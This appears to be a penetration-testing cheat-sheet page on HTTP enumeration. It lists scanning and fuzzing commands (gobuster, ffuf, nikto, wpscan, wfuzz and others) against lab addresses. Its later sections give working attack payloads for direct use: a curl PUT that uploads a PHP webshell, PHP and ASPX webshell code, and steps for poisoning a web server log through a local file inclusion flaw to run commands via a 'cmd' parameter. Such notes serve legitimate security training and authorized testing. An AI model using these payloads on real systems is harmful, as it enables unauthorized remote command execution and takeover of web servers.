HTTP Enum

Enumerate directories.

The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt 
Gobuster
# URL Search
​
-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux
​
-- Comprehensive Directory Busting
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
​
-- Search with File Extension
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php
​
==========================================================================================================================================================================================
​
# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt
​
==========================================================================================================================================================================================
​
# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt
FFUF
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
Nikto Web Scan
nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range
Wordpress Scan
wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/
​
wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at]
​
**** User ****
u: enumerate users
​
**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins
​
**** Themes Switches ****
t: Popular themes only
vt: Vulnerable plugins only
at: All themes
Drupal
droopescan scan drupal -u http://10.10.10.10/ -t 32
Joomla
joomscan -u http://10.10.10.10/
Dirb
dirb http://10.10.10.x
​
******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats
​
dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt
​
-x : use this extension list against the wordlists within big.txt
Dirsearch
git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>
​
Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
​
-u: URL to scan.
-e: formats to search.
-w: wordlist.
Netcat
nc 10.10.10.10 80
HEAD / HTTP/1.0
GET / HTTP/1.0
cUrl
# Header
curl -i INSERTIPADDRESS
​
# Everything else
curl -i -L INSERTIPADDRESS
​
# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
​
# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq
​
# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php
Wfuzz
----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php
​
----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ
​
----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62
Upload a PHP file
In case you can upload a file try the below. This can be used for reverse shell too.
​
<?php echo system($_GET["cmd"]);?>
​
OR
​
<?php echo shell_exec($_GET["cmd"]);?>
WebDav
davtest -url http://10.10.10.10    <-- Make a test to see file extensions upload.
cadaver http://10.10.10.10/        <-- Connect
ASPx Webshell
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmdStdOut.Readall()
Response.write(o)
%>
Code Execution through HTTP/LFI
nc 10.10.10.10
<?php system($_GET['cmd']); ?>
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 
​
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami
​

LDAP Enum

CheckList

Last modified 2yr ago

HTTP Enum

The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt

Gobuster

FFUF

Nikto Web Scan

Wordpress Scan

Drupal

Joomla

Dirb

Dirsearch

Netcat

cUrl

Wfuzz

Upload a PHP file

WebDav

ASPx Webshell

Code Execution through HTTP/LFI

​

`The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt`